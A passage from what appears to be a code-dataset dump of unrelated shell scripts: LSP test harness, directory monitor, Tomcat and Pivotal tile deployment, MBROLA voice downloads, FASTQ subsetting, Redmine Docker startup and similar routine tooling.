{"range":{"start":{"line":1, "character": 7}, "end":{"line":1, "character": 8}}},
{"range":{"start":{"line":1, "character":20}, "end":{"line":1, "character":21}}}
]
}
},
{
"json_contains":{
"id":21,
"result": []
}
},
{
"json_contains": {
"method":"textDocument/publishDiagnostics",
"params": {
"uri": "file://fmt.sv",
"diagnostics":[]
}
}
},
{
"json_contains":{
"id":30,
"result": [
{"newText":" assign a=1;\n","range":{"end":{"character":0,"line":2},"start":{"character":0,"line":1}}}
]
}
},
{
"json_contains":{
"id":31,
"result": [
{"newText":" assign a=1;\n","range":{"end":{"character":0,"line":2},"start":{"character":0,"line":1}}}
]
}
},
{
"json_contains":{
"id":32,
"result": [
{"newText":" assign b=2;\nendmodule\n","range":{"end":{"character":0,"line":3},"start":{"character":0,"line":2}}}
]
}
},
{
"json_contains":{
"id":33,
"result": [
{"newText":" assign a = 1;\n assign b = 2;\nendmodule\n","range":{"end":{"character":0,"line":3},"start":{"character":0,"line":1}}}
]
}
},
{
"json_contains":{
"id":34,
"result": [{
"newText": "module fmt ();\n assign a = 1;\n assign b = 2;\nendmodule\n",
"range": {"end":{"character":0,"line":3},"start":{"character":0,"line":0}}
}]
}
},
{
"json_contains": { "id":100 }
}
]
EOF
# Drive the server with the prepared requests: server stderr is captured in
# MSG_OUT while stdout (the JSON-RPC responses) is checked by
# json-rpc-expect against the expectations file.
"${LSP_SERVER}" < ${TMP_IN} 2> "${MSG_OUT}" \
  | ${JSON_RPC_EXPECT} ${JSON_EXPECTED}
JSON_RPC_EXIT=$?
echo "-- stderr messages --"
cat ${MSG_OUT}
if [ $JSON_RPC_EXIT -ne 0 ]; then
  # json-rpc-expect outputs the entry, where the mismatch occured, in exit code
  echo "Exit code of json rpc expect; first error at $JSON_RPC_EXIT"
  exit 1
fi
# The server is expected to log handling of the final shutdown request.
grep "shutdown request" "${MSG_OUT}" > /dev/null
if [ $? -ne 0 ]; then
  echo "Didn't get shutdown feedback"
  exit 1
fi
acec7b56cf7361f01296518445089b2c0ec741d5 | Shell | Torqu3Wr3nch/docker-esetAV | /root/etc/services.d/directoryMonitor/run | UTF-8 | 2,852 | 3.578125 | 4 | [] | no_license | #!/bin/bash
# Watch /mnt/monitor for completed writes (CLOSE_WRITE) and maintain an
# access log of recently-touched directories ("YYYY-MM-DD HH:MM:SS <dir>"
# per line) that a separate scanner service consumes.
accessLog=/tmp/esetAV/accessLog
scanInProgressLog=/tmp/esetAV/scanInProgress
inotifywait -m -e CLOSE_WRITE -r --timefmt "%F %T" --format "%T %w" /mnt/monitor \
| while read ENTRY
do
# Strip the leading "date time " prefix, keeping just the directory path.
FILEDIRECTORY=$(echo "$ENTRY" | sed 's/[0-9]\{4\}\-[0-9]\{2\}\-[0-9]\{2\}\s[0-9]\{2\}\:[0-9]\{2\}\:[0-9]\{2\}\s//')
# Check if directory is being scanned (including if its superdirectory about to be scanned)
if [[ -z $(awk -v dir="$FILEDIRECTORY" '$0 == substr(dir, 1, length($0))' $scanInProgressLog) ]]; then
# If directory already in the accessLog (or if itself is a superdirectory of a directory that's already in the accessLog), update time stamp.
if grep -q -F "$FILEDIRECTORY" $accessLog; then
# Escape both strings for use inside the sed s/// below.
FILEDIRECTORY=$(echo "$FILEDIRECTORY" | sed -e 's/[]\/$*.^[]/\\&/g')
ENTRY=$(echo "$ENTRY" | sed -e 's/[\/&]/\\&/g')
# NOTE(review): the log is rewritten under a *shared* lock (flock -s);
# an exclusive lock (flock -x / default) looks intended for writers --
# confirm against the scanner's locking.
flock -s $accessLog -c "sed -i \"s/.*$FILEDIRECTORY.*/$ENTRY/g\" $accessLog; sort -u $accessLog -o $accessLog" # If we update a bunch of directories to their superdirectory, merge the matches with sort.
else
# If entry is a subdirectory of a directory already on the accessLog, simply update the time stamp.
# substr($0,21)/length($0)-20 skip the 20-character timestamp prefix.
parentDirectoryLine=$(awk -v dir="$FILEDIRECTORY" 'substr($0,21) == substr(dir, 1, length($0)-20)' $accessLog)
if [[ -n $parentDirectoryLine ]]; then
# Rebuild the parent's line with the new event's timestamp.
entryTimeStamp=$(echo "$ENTRY" | sed 's/\s\/.*//')
directory=$(echo "$parentDirectoryLine" | sed 's/[0-9]\{4\}\-[0-9]\{2\}\-[0-9]\{2\}\s[0-9]\{2\}\:[0-9]\{2\}\:[0-9]\{2\}\s//')
replacementEntry=$entryTimeStamp" "$directory
parentDirectoryLine=$(echo "$parentDirectoryLine" | sed -e 's/[]\/$*.^[]/\\&/g')
replacementEntry=$(echo "$replacementEntry" | sed -e 's/[\/&]/\\&/g')
flock -s $accessLog -c "sed -i \"s/$parentDirectoryLine/$replacementEntry/g\" $accessLog"
# If we make it this far, we have no record of this directory, add it to the list.
else
flock -s $accessLog -c "echo \"$ENTRY\" >> $accessLog"
fi
fi
fi
done
3fcfb1479355b2052752dbb2aa98212683f65843 | Shell | esproul/nad | /plugins/cassandra/cassandra_po.sh | UTF-8 | 658 | 3.390625 | 3 | [] | no_license | #!/bin/bash
source /opt/circonus/etc/cass-po-conf.sh

# Locate the protocol_observer binary: prefer the default install location,
# otherwise fall back to whatever is found on PATH.
po=/opt/circonus/bin/protocol_observer
if [[ ! -x $po ]]; then
    # Fix: error message said "Unable to location"; also replaced the
    # backtick + "[[ $? -eq 0 ]]" pattern with $() and a direct || check.
    po=$(type -P protocol_observer) \
        || { echo 'Unable to locate protocol_observer binary'; exit 1; }
fi

# Capture interface and NAD submission endpoint (trailing slash stripped).
IFACE="${IFACE:="auto"}"
NADURL="${NADURL:="http://localhost:2609"}"
NADURL=${NADURL%/}

# if protocol_observer is already running, exit
popid=$(pgrep -n -f 'protocol_observer -wire cassandra_cql')
if [[ -n "$popid" ]]; then
    echo "already running with pid $popid"
    exit 0
fi

# Start the observer in the background, reporting to NAD's write endpoint.
sudo $po -wire cassandra_cql -submissionurl ${NADURL}/write/cassandra_protocol_observer &
| true |
2c871d14bbe356024217b44783b2b095c6e2e6fb | Shell | zarelaky/android-offline-docs-utils | /replace_ytblogger_lists_unified_js.sh | UTF-8 | 228 | 2.859375 | 3 | [
"Apache-2.0"
] | permissive |
# Remove <script ...ytblogger_lists_unified.js...></script> tags from every
# file under the current tree that references the script -- except the
# script file itself, which must not be edited.
target=ytblogger_lists_unified.js
# grep -l prints each matching file once and is immune to ':' in paths
# (the old grep|awk -F: pipeline truncated such paths and repeated files).
grep -rl -- "$target" . > .l
while IFS= read -r i; do
	# Skip the JS file itself.  Fix: the original wrote "case i in", which
	# matched the literal string "i" and therefore never skipped anything.
	case $i in
		*"$target") continue ;;
	esac
	sed -i "s#<script.*$target.*</script>##g" "$i"
done < .l
rm .l
| true |
880ff190c87802a4c17a4efbc4737472cf3118da | Shell | lx668/shell | /tomcat-js-deploy/web-autopublish.sh | UTF-8 | 1,115 | 2.59375 | 3 | [] | no_license | #!/bin/bash
# Build the bi-web module from the chaos repo and redeploy it as the ROOT
# webapp of the local Tomcat, keeping a timestamped backup of each war.
WAR_PATH="/data/www/war"
SITE_PATH="/data/www/site"
TOMCAT_PATH="/data/services/apache-tomcat-8.5.4/"
PROJECT_NAME="bi-web"
# Update sources and build (parent project first, then the module).
cd /data/code/chaos
git pull
mvn clean install -Pprod -Dmaven.test.skip=true
cd $PROJECT_NAME/
mvn clean install -Pprod -Dmaven.test.skip=true
# Stage the fresh war and keep a timestamped backup copy.
rm -rf $WAR_PATH/"$PROJECT_NAME".war
rm -rf $WAR_PATH/$PROJECT_NAME
mv target/$PROJECT_NAME-1.0.0.war $WAR_PATH/"$PROJECT_NAME".war
cp $WAR_PATH/"$PROJECT_NAME".war $WAR_PATH/backup/"$PROJECT_NAME".`date +%Y%m%d%H%M%S`.war
mkdir -p $WAR_PATH/$PROJECT_NAME
mv $WAR_PATH/"$PROJECT_NAME".war $WAR_PATH/$PROJECT_NAME/
# Explode the war in place.
cd $WAR_PATH/$PROJECT_NAME
jar xvf "$PROJECT_NAME".war
rm -rf "$PROJECT_NAME".war
cd $SITE_PATH
# Stop Tomcat and swap in the new exploded webapp as ROOT.
# NOTE(review): kill -9 on the Bootstrap JVM skips graceful shutdown; trying
# shutdown.sh first would be gentler -- confirm this is deliberate.
jps |grep Bootstrap|awk '{print $1}'|xargs kill -9
rm -rf $SITE_PATH/${PROJECT_NAME}
rm -rf $SITE_PATH/ROOT
rm -rf $TOMCAT_PATH/work/Catalina/localhost/${PROJECT_NAME}
mv $WAR_PATH/$PROJECT_NAME/ $SITE_PATH/${PROJECT_NAME}
ln -s $SITE_PATH/${PROJECT_NAME} $SITE_PATH/ROOT
# Push static assets to the web host; assumes a pre-provisioned SSH key for
# the hard-coded remote -- verify.
scp -rP22 /opt/app/wecash/* root@10.169.27.36:/opt/www/
sh /data/command/replace.sh
sh $TOMCAT_PATH/bin/startup.sh
tail -f $TOMCAT_PATH/logs/catalina.out
| true |
eecff26ac26907bc6cb89bc5305b8edc52494553 | Shell | hexhex/dlliteplugin | /benchmarks/scripts/testset.sh | UTF-8 | 3,846 | 3.46875 | 3 | [] | no_license | #$1 (optional) limit support set size or number by repair computation value supsize/supnum
#$2 (optional) bound on support set size (resp. number)
# Optional repair bound: $1 selects the option (supsize|supnum), $2 its value.
lim=""
# Fix: the original wrote "[[ $2!=\"\" ]]" (no spaces), which bash evaluates
# as a single-string truth test and is therefore always true; the separated
# form below performs the intended non-empty comparison on $2.
if [[ $# == 2 ]] && [[ $1 != "" ]] && [[ $2 != "" ]]; then
	lim="--$1=$2"
	echo "Testing partial support families, option $lim is enabled for repair"
fi
start=`date +%s`
loop="instances/*.hex"
# prepare instances folder
if [ -d "instances/consistent" ]; then
rm -f -r instances/consistent/*
else
mkdir -p instances/consistent
fi
rm -f instances/*.out
cmd="dlvhex2 --heuristics=monolithic --plugindir=../../../../src --liberalsafety --silent -n=1"
count=`ls -1 instances/*.hex 2>/dev/null | wc -l`
if [ $count != 0 ]; then
echo "Checking consistency of $count instance(s).."
(echo "number of instances: $count") >> test_result
for instance in $(eval "echo $loop")
do
$cmd $instance 1>$instance.anset
hexfilename="$instance"
owlstring=owl
ontofilename=$(echo $hexfilename | sed "s/hex/${owlstring}/ g" -)
asfilename=$(echo $instance.anset)
#echo "hex file: $hexfilename"
#echo "owl file: $ontofilename"
if [[ -s $instance.anset ]]; then
mv $hexfilename instances/consistent
mv $ontofilename instances/consistent
mv $asfilename instances/consistent
else
(echo "$hexfilename") >> test_result
fi
done
else
echo "There are no files in the instance directory"
fi
# all consistent instances are moved to the respective folder, and inconsistent ones are left in the instances folder
# we loop over inconsistent instances and compute repairs
incloop="instances/*.hex"
cmdrep="dlvhex2 --heuristics=monolithic --plugindir=../../../../src --supportsets --el --liberalsafety --silent -n=1 --supsize=3"
count=`ls -1 instances/*.hex 2>/dev/null | wc -l`
if [ $count != 0 ]; then
#remove anset and repinfo files from the instances directory (they all are empty)
rm -f instances/*.repinfo
rm -f instances/*.anset
#create a folder for storing repaired instances
#if [ -d "instances/repaired" ]; then
# rm -f -r instances/repaired/*
#else
# mkdir -p instances/repaired
#fi
#loop over programs in instance folder and compute repairs
echo "Repairing $count inconsistent instance(s)..."
(echo "number of inconsistent instances: $count") >> test_result
for instance in $(eval "echo $incloop")
do
hexfilename="$instance"
#echo "hex file: $hexfilename"
owlstring=owl
ontofilename=$(echo $hexfilename | sed "s/hex/${owlstring}/ g" -)
#echo "owl file: $ontofilename"
awk ' BEGIN { print "repair answer set: " } ' >>$instance.repinfo
$cmdrep $instance --repair=$ontofilename --verbose=1 2>$instance.out >>$instance.repinfo
awk ' BEGIN { print "******************" } ' >>$instance.repinfo
# check whether repair was found
cat $instance.out | grep "#RMG:" >$instance.rep
sed -i 's/\ 1 eO gM #RMG: PC: //g' $instance.rep
cat $instance.rep >> $instance.repinfo
awk ' BEGIN { print "******************" } ' >>$instance.repinfo
rm $instance.rep
#rm $instance.out
cp $ontofilename $ontofilename.orig
cat $instance.repinfo | while read line
do
template="aux_o_0_1"
if [[ "$line" =~ "$template" ]]; then
line=$(echo $line | sed s/aux_o_0_1\(\"//g)
line=$(echo $line | sed s/\"\)//g)
line=$(echo $line | sed s/\"//g)
line=$(echo $line | sed s/,/' '/g)
echo "'$line' is removed from $ontofilename";
/home/dasha/Documents/software/owl-toolkit/v\-1/owl-toolkit/dist/owl-fact-remove $line $ontofilename
fi
done
awk ' BEGIN { print "answer set of a repaired program:" } ' >>$instance.repinfo
$cmd $instance $lim >>$instance.repinfo
mv $ontofilename $ontofilename.repaired
mv $ontofilename.orig $ontofilename
done
else
echo "all instances are consistent"
fi
end=`date +%s`
runtime=$((end-start))
echo "Runtime: $runtime"
| true |
c7e211cd05a0d978000b86208fd8113823a02657 | Shell | adhytianara/SistemOperasi | /Demos/Week01/a06-loop | UTF-8 | 958 | 3.265625 | 3 | [] | no_license | #!/bin/bash
# REV07: Thu Feb 6 20:43:55 WIB 2020
# REV06: Mon Aug 27 20:07:30 WIB 2018
# START: Mon Sep 5 14:34:41 WIB 2016
# Copyright (C) 2016-2020 Rahmat M. Samik-Ibrahim
# http://RahmatM.Samik-Ibrahim.vLSM.org/
# This program is free script/software. This program is distributed in the hope
# that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# INFO: Just run "bash a06-loop 11 22 33 44"
#
# Teaching demo: contrasts quoted "$*" (all positional parameters joined
# into ONE word) with quoted "$@" (one word per parameter) in a for-loop.
INFO=".zzz-generate-READ-THIS-FIRST.sh"
echo ""
# Run the course helper script first, if it exists in this directory.
[ -f $INFO ] && bash $INFO $0
echo ""
# Require at least three arguments so the demo output is meaningful.
[ -z "$3" ] && { echo "Run this AGAIN with arguments. Eg. \"bash a06-loop 11 22 33 44\"" ; exit 1; }
echo "========= ========= ========= ========= ========= ========= ========= ========="
echo 'Loop with [*]'
# "$*" is a single word: this loop body runs exactly once.
for ii in "$*"
do
echo $ii
done
echo "========= ========= ========= ========= ========= ========= ========= ========="
echo 'Loop with [@]'
# "$@" keeps each argument separate: one iteration per argument.
for ii in "$@"
do
echo $ii
done
exit 0
| true |
78c521be1c8245c8a5a98f84aae262e9c551e389 | Shell | rafalh/mtasa_toxic | /toxic/conf/validate.sh | UTF-8 | 228 | 3.125 | 3 | [
"MIT"
] | permissive | #!/bin/sh
set -e

# Validate every XML file in the current directory.  When a matching XSD
# exists under xsd/, validate against the schema as well; otherwise only
# check well-formedness.
for xml_file in *.xml ; do
	xsd_file="xsd/${xml_file%.*}.xsd"
	if [ ! -f "$xsd_file" ] ; then
		# No schema available -- well-formedness check only.
		xmllint "$xml_file" --noout
		continue
	fi
	# Check the schema itself is well-formed, then validate against it.
	xmllint "$xsd_file" --noout
	xmllint -schema "$xsd_file" "$xml_file" --noout
done
| true |
1a1a02152f3eb19394ac67bb4cc9280728a55fc7 | Shell | wso2/pivotal-cf-is | /pattern-1/ops_update.sh | UTF-8 | 3,361 | 3.609375 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# ----------------------------------------------------------------------------
#
# Copyright (c) 2019, WSO2 Inc. (http://www.wso2.org) All Rights Reserved.
#
# WSO2 Inc. licenses this file to you under the Apache License,
# Version 2.0 (the "License"); you may not use this file except
# in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ----------------------------------------------------------------------------
# Pull the latest tile sources from git, rebuild the tile, obtain an Ops
# Manager UAA token, and upload the rebuilt .pivotal product to Ops Manager.
# exit immediately if a command exits with a non-zero status
set -e
usage() { echo "Usage: $0 [-b <branch name>] [-u <username>] [-p <password>]" 1>&2; exit 1; }
while getopts ":b:u:p:" o; do
    case "${o}" in
        b)
            branch=${OPTARG}
            ;;
        u)
            username=${OPTARG}
            ;;
        p)
            password=${OPTARG}
            ;;
        *)
            usage
            ;;
    esac
done
shift $((OPTIND-1))
# All three options are mandatory.
if [ -z "${branch}" ] || [ -z "${username}" ] || [ -z "${password}" ]; then
    usage
fi
echo "Pulling changes from branch..."
git fetch
git checkout ${branch}
# Check for changes: compare local HEAD, its upstream, and their merge base
# to decide between up-to-date / fast-forward pull / abort.
# ('@{u}' is the upstream of the current branch; no positional argument is
# expected after option parsing, so the default always applies.)
upstream=${1:-'@{u}'}
local=$(git rev-parse @)
remote=$(git rev-parse "$upstream")
base=$(git merge-base @ "$upstream")
if [ ${local} = ${remote} ]; then
    # up-to-date
    exit 0
elif [ ${local} = ${base} ]; then
    # Local is strictly behind upstream: safe to pull.
    git pull origin ${branch}
elif [ ${remote} = ${base} ]; then
    echo "Changes made in local branch. Please revert changes and retry."
    exit 1
else
    echo "Local repository Diverged. Please revert changes and retry."
    exit 1
fi
echo "Updating tile..."
/bin/bash update.sh
rc=$?;
if [[ ${rc} != 0 ]]; then
    echo "Error occurred while updating tile. Terminating with exit code $rc"
    exit ${rc};
fi
echo "Obtaining access token..."
# Password-grant token request against the local Ops Manager UAA
# (-k: the endpoint uses a self-signed certificate).
response=$(curl -s -k -H 'Accept: application/json;charset=utf-8' -d 'grant_type=password' -d "username=$username" -d "password=$password" -u 'opsman:' https://localhost/uaa/oauth/token)
# Extract the token with sed; on failure, repeat the call just to report
# the HTTP status code.
access_token=$(echo ${response} | sed -nE 's/.*"access_token":"(.*)","token.*/\1/p')
if [ -z "$access_token" ]
then
    status_code=$(curl --write-out %{http_code} --output /dev/null -s -k -H 'Accept: application/json;charset=utf-8' -d 'grant_type=password' -d "username=$username" -d "password=$password" -u 'opsman:' https://localhost/uaa/oauth/token)
    echo "Access token could not be obtained. Status code: $status_code"
    exit 1
fi
echo "Uploading new tile..."
cd tile/product
product_dir=$(pwd)
# Default tile glob, overridable via the product_tile environment variable.
: ${product_tile:="wso2is*.pivotal"}
# capture the exact product distribution identifiers
product_tile=$(ls ${product_tile})
tile_filepath=${product_dir}/${product_tile}
status_code=$(curl --write-out %{http_code} --output /dev/null -H "Authorization: Bearer $access_token" 'https://localhost/api/products' -F "product[file]=@$tile_filepath" -X POST -k)
if [ ${status_code} = 200 ]; then
    echo "Updated tile successfully added to Ops Manager"
else
    echo "Error while adding tile to Ops Manager. Status code ${status_code}"
fi
| true |
3563e7cc88adf7730c8ad5bdf25d58c7a00dd283 | Shell | project-renard-experiment/tts-experiment | /tool/festival/01_voices-mbrola | UTF-8 | 1,762 | 3.1875 | 3 | [] | no_license | #!/bin/sh
# Download the MBROLA binary package plus the us1/us2/us3 voice databases
# and unpack them into festival-data/voice/mbrola for later installation.
CURDIR=$(dirname "$0")
TOP="$CURDIR/../.."
WORK="$TOP/festival-data/voice/mbrola"
WORK_EXTRACT="$WORK/extract"
mkdir -p "$WORK"
mkdir -p "$WORK_EXTRACT"
echo "This downloads and unpacks the MBROLA voices"
# -c resumes partial downloads, so re-running the script is cheap.
wget -P "$WORK" -c \
    http://tcts.fpms.ac.be/synthesis/mbrola/bin/pclinux/mbrola3.0.1h_i386.deb \
    http://tcts.fpms.ac.be/synthesis/mbrola/dba/us1/us1-980512.zip \
    http://tcts.fpms.ac.be/synthesis/mbrola/dba/us2/us2-980812.zip \
    http://tcts.fpms.ac.be/synthesis/mbrola/dba/us3/us3-990208.zip
    #http://www.festvox.org/packed/festival/latest/festvox_us1.tar.gz \
    #http://www.festvox.org/packed/festival/latest/festvox_us2.tar.gz \
    #http://www.festvox.org/packed/festival/latest/festvox_us3.tar.gz
for zip_file in us1-980512.zip us2-980812.zip us3-990208.zip; do
    ls "$WORK/$zip_file"
    unzip "$WORK/$zip_file" -d "$WORK_EXTRACT"
done
for tar_file in festvox_us1.tar.gz festvox_us2.tar.gz festvox_us3.tar.gz; do
    # These tarballs are only present if the commented-out festvox URLs
    # above were fetched manually; skip quietly instead of failing.
    [ -f "$WORK/$tar_file" ] || continue
    # BUG FIX: old-style bundled options ("xzvf") are only valid as tar's
    # FIRST argument; after "-C dir" they were taken as an operand.  Use
    # explicit flags with -C for the extraction directory.
    tar -xzvf "$WORK/$tar_file" -C "$WORK_EXTRACT"
done
#sudo dpkg -i $WORK_EXTRACT/mbrola3.0.1h_i386.deb
#sudo mkdir -p /usr/share/festival/voices/english/us1_mbrola/
#sudo mkdir -p /usr/share/festival/voices/english/us2_mbrola/
#sudo mkdir -p /usr/share/festival/voices/english/us3_mbrola/
#sudo mv $WORK_EXTRACT/us1 /usr/share/festival/voices/english/us1_mbrola/
#sudo mv $WORK_EXTRACT/us2 /usr/share/festival/voices/english/us2_mbrola/
#sudo mv $WORK_EXTRACT/us3 /usr/share/festival/voices/english/us3_mbrola/
#sudo mv $WORK_EXTRACT/festival/lib/voices/english/us1_mbrola/* /usr/share/festival/voices/english/us1_mbrola/
#sudo mv $WORK_EXTRACT/festival/lib/voices/english/us2_mbrola/* /usr/share/festival/voices/english/us2_mbrola/
#sudo mv $WORK_EXTRACT/festival/lib/voices/english/us3_mbrola/* /usr/share/festival/voices/english/us3_mbrola/
| true |
d762338703232f8b99f8ea5b40dbad4838605fe4 | Shell | Freevini/RNAseq_pipeline | /scripts/subsetting_files.sh | UTF-8 | 508 | 2.609375 | 3 | [] | no_license | ##================
##subsetting files
##================
# Truncate every FASTQ under $ROOT/FASTQ to its first 1,000,000 lines
# (250,000 reads) and recompress the truncated copy in place.
ROOT=/home/bioinf/bioinf_data/43_sovi/Projects/Metagenomics_pipeline/Model_data/e_coli/05_trial_05
for fq in "$ROOT"/FASTQ/*.fastq.gz
do
LIB=$(basename "$fq" .fastq.gz)
echo "${LIB}"
# BUG FIX: the old pipeline ran the *compressed* file through head, which
# slices raw gzip bytes and yields a corrupt file; decompress with zcat.
zcat "$fq" | head -n 1000000 > "$ROOT/FASTQ/${LIB}.fastq"
# -f: replace the existing .fastq.gz with the truncated version.
gzip -f "$ROOT/FASTQ/${LIB}.fastq"
done
ls "$ROOT"/FASTQ | awk -F"." '{print $1}'
# One-off leftover for a single sample, fixed the same way:
zcat FASTQ/SRR2135666.fastq.gz | head -n 1000000 > FASTQ/SRR2135666.fastq
gzip -f FASTQ/SRR2135666.fastq
| true |
f0b6e67b453f75f8e5e1b0ec62fd1fcfa92467af | Shell | toshi0383/xcodeproj-fixtures | /archive/SPM/bootstrap | UTF-8 | 253 | 2.921875 | 3 | [] | no_license | #!/bin/bash
set -eo pipefail
# Generate SwiftPM fixture projects: for each package type, create a fresh
# package and its Xcode project in a directory named after the type.
for type in empty library executable system-module
do
mkdir $type
cd $type
swift package init --type $type
# Strip the xcodeproj ignore rule so the generated project can be committed.
grep -v xcodeproj .gitignore > a; mv a .gitignore
swift package generate-xcodeproj
cd -
done
| true |
48920037e57b28950df2b1dd84043a3b8116589d | Shell | lucaswannen/source_code_classification_with_CNN | /dataset_v2/bash/3948532.txt | UTF-8 | 256 | 3.359375 | 3 | [] | no_license | #!/bin/sh
# Count the entries inside directory $1 whose permission string differs
# from the permissions of $1 itself.  ("nu este director" is Romanian for
# "is not a directory".)
if [ ! -d "$1" ]
then
    echo "$1" nu este director
    # BUG FIX: was "exit1" (missing space), which is not a command.
    exit 1
fi
# BUG FIX: "permission= ls ..." only exported an empty variable to the ls
# command; capture the output with command substitution.  -d lists the
# directory entry itself rather than its contents.
permission=$(ls -ld "$1" | cut -d" " -f1)
# BUG FIX: n was never initialised (expr on an empty value fails).
n=0
# NOTE: the original recursed via "ls -R > temp" but then iterated bare
# file names that ls could not resolve; this version checks the
# directory's immediate entries via a glob.
for i in "$1"/*
do
    perm=$(ls -ld "$i" | cut -d" " -f1)
    # BUG FIX: -ne compares integers; permission strings need a string test.
    if [ "$permission" != "$perm" ]
    then
        n=$(expr $n + 1)
    fi
done
# BUG FIX: the count was printed on every iteration; print it once.
echo $n
| true |
76b84ab5aa29d2927321e4b5252b57021d18ff4a | Shell | FayeHuang/docker-redmine | /scripts/start.sh | UTF-8 | 1,073 | 3.515625 | 4 | [] | no_license | #!/bin/bash
# Launch a Redmine stack: start PostgreSQL, wait until it accepts
# connections, start a linked Redmine container, then inject the Redmine
# configuration file into the running container.
postgres_image=postgres:9
redmine_image=redmine:3.0.5
# Redmine host port
redmine_port=18888
# PostgreSQL host port
postgres_port=15432
# Host path holding Redmine attachment (uploaded file) data
redmine_file=/home/redmine/backup/data/files
# Host path holding the PostgreSQL data directory
postgres_data=/home/redmine/backup/data/pg_data
# Host path of the Redmine configuration file
redmin_config_file=/home/redmine/backup/configuration.yml
pg_cid=$(docker run -d -p $postgres_port:5432 -v $postgres_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=redmine -e POSTGRES_USER=redmine $postgres_image)
pg_ip=$(docker inspect --format '{{ .NetworkSettings.IPAddress }}' $pg_cid)
# Poll the helper script until PostgreSQL reports it is ready.
while [[ $(sh pg_connection_test.sh $pg_ip) != "ok" ]];
do
sleep 1
echo "wait postgresql ready, wait 1s ..."
done
redmine_cid=$(docker run -d -p $redmine_port:3000 -v $redmine_file:/usr/src/redmine/files --link $pg_cid:postgres $redmine_image)
# Record both container ids.  NOTE(review): presumably consumed by a
# companion stop/teardown script -- confirm.
echo "$redmine_cid" > containers
echo "$pg_cid" >> containers
# Stream the host config file into the container's Redmine config path.
cat $redmin_config_file | docker exec -i $redmine_cid /bin/bash -c 'cat >'/usr/src/redmine/config/configuration.yml
163457603d8b18dcd27a69d84e330c6802dbc299 | Shell | duckdb/duckdb | /tools/juliapkg/format_check.sh | UTF-8 | 318 | 3.34375 | 3 | [
"MIT"
] | permissive | set -e
# Refuse to run on a dirty tree so that any differences after formatting
# are attributable to ./format.sh alone.
# IMPROVEMENT: use `git diff --quiet` (exit status only) instead of
# capturing the entire diff text into memory just to test for emptiness.
if ! git diff --quiet; then
	echo "There are already differences prior to the format! Commit your changes prior to running format_check.sh"
	exit 1
fi
./format.sh
if ! git diff --quiet; then
	echo "Julia format found differences:"
	git diff
	exit 1
else
	echo "No differences found"
	exit 0
fi
| true |
3168867f5bdfbf72b2b3d6414d5344b5ef6aab87 | Shell | petronny/aur3-mirror | /python2-termbox-git/PKGBUILD | UTF-8 | 912 | 2.953125 | 3 | [] | no_license | # Maintainer: Andrew Grigorev <andrew@ei-grad.ru>
pkgname=python2-termbox-git
pkgver=20131003
pkgrel=1
pkgdesc="Library that helps making Terminal-based Pseudo-GUIs (ncurses-like, but simpler)"
arch=('i686' 'x86_64')
url="http://code.google.com/p/termbox/"
license=('custom')
depends=('python2')
makedepends=('git' 'pyrex')
_gitroot='git://github.com/nsf/termbox.git'
_gitname='termbox'
build() {
cd "$srcdir"
msg "Connecting to GIT server...."
if [ -d $_gitname ] ; then
cd $_gitname && git pull origin
msg "The local files are updated."
else
git clone $_gitroot $_gitname
fi
msg "GIT checkout done or server timeout"
msg "Starting make..."
rm -rf "$srcdir/$_gitname-build"
git clone "$srcdir/$_gitname" "$srcdir/$_gitname-build"
cd "$srcdir/$_gitname-build"
python2 setup.py build
}
package() {
cd "$srcdir/$_gitname-build"
python2 setup.py install --root="$pkgdir" --optimize=1
}
| true |
2973b24d62304173c2f844132acad2c64ffac228 | Shell | agustinustheo/judgeyou | /rhetoric/apis/speechanalyzer/install-dependencies.sh | UTF-8 | 678 | 2.578125 | 3 | [] | no_license | #!/bin/bash
# ----- AUDIO EXTRACTOR -------
# Dependencies for youtube-dl download video from youtube and extract audio
sudo apt-get install ffmpeg
# ------ DEEPSPEECH -------------
# Git LFS needed for deepspeech development
# sudo add-apt-repository ppa:git-core/ppa
# curl -s https://packagecloud.io/install/repositories/github/git-lfs/script.deb.sh | sudo bash
# sudo apt-get install git-lfs
# git lfs install
# Get Dependencies
sudo apt install libsox3 libstdc++6 libgomp1 libpthread-stubs0-dev sox
# get deepspeech pretrained model
wget https://github.com/mozilla/DeepSpeech/releases/download/v0.4.1/deepspeech-0.4.1-models.tar.gz
tar xvfz deepspeech-0.4.1-models.tar.gz | true |
b1f1cd45aa11820db3de9957c160f272899356be | Shell | jiricodes/42-sudoku | /tests/scripts/test_files.sh | UTF-8 | 534 | 3.6875 | 4 | [
"MIT"
] | permissive | #! /bin/bash
# takes sudoku binary, test files input and expected folders as arguments
# assumes ex
# Runs $SUDOKU once per file in $INPUTS: each input file holds the
# command-line arguments; stdout+stderr are captured under $OUTPUTS/<name>
# and diffed against $EXPECT/<name>.  Failures leave a <name>_diff file.
SUDOKU=$1
BASEDIR=$(dirname "$0")
INPUTS=$2
EXPECT=$3
OUTPUTS=$BASEDIR/../outputs
# ANSI green/red labels; the \033 escapes are later expanded because they
# end up inside the printf FORMAT string.
OK='\033[0;32mOK\033[0m'
FAILED='\033[0;31mFAILED\033[0m'
for f in $INPUTS/*
do
	fname=$(basename "$f")
	# Intentionally unquoted below: the file's content is word-split into
	# separate program arguments.
	args=$(cat $f)
	./$SUDOKU $args > $OUTPUTS/$fname 2>&1
	diff=$(diff $OUTPUTS/$fname $EXPECT/$fname)
	if [ -z "$diff" ]
	then
		printf "%-56s $OK\n" $fname
	else
		printf "%-56s $FAILED\n" $fname
		# Keep the diff next to the output for later inspection.
		echo "$diff" > $OUTPUTS/${fname}_diff
	fi
done
01e9e9294f246d5609d6e4dc7f21cf319ddb90aa | Shell | carletes/vagrant-http-load-balancer | /provision/provision-lb.sh | UTF-8 | 204 | 2.640625 | 3 | [] | no_license | #!/bin/sh
# Install the relayd load-balancer configuration, then start relayd or
# reload the running instance.
for cfg in rc.conf.local relayd.conf ; do
    cp "/vagrant/provision/$cfg" /etc/
done

# A readable control socket means relayd is already running.
if [ ! -r /var/run/relayd.sock ] ; then
    # First start: pick up relayd_flags from the freshly copied rc.conf.local.
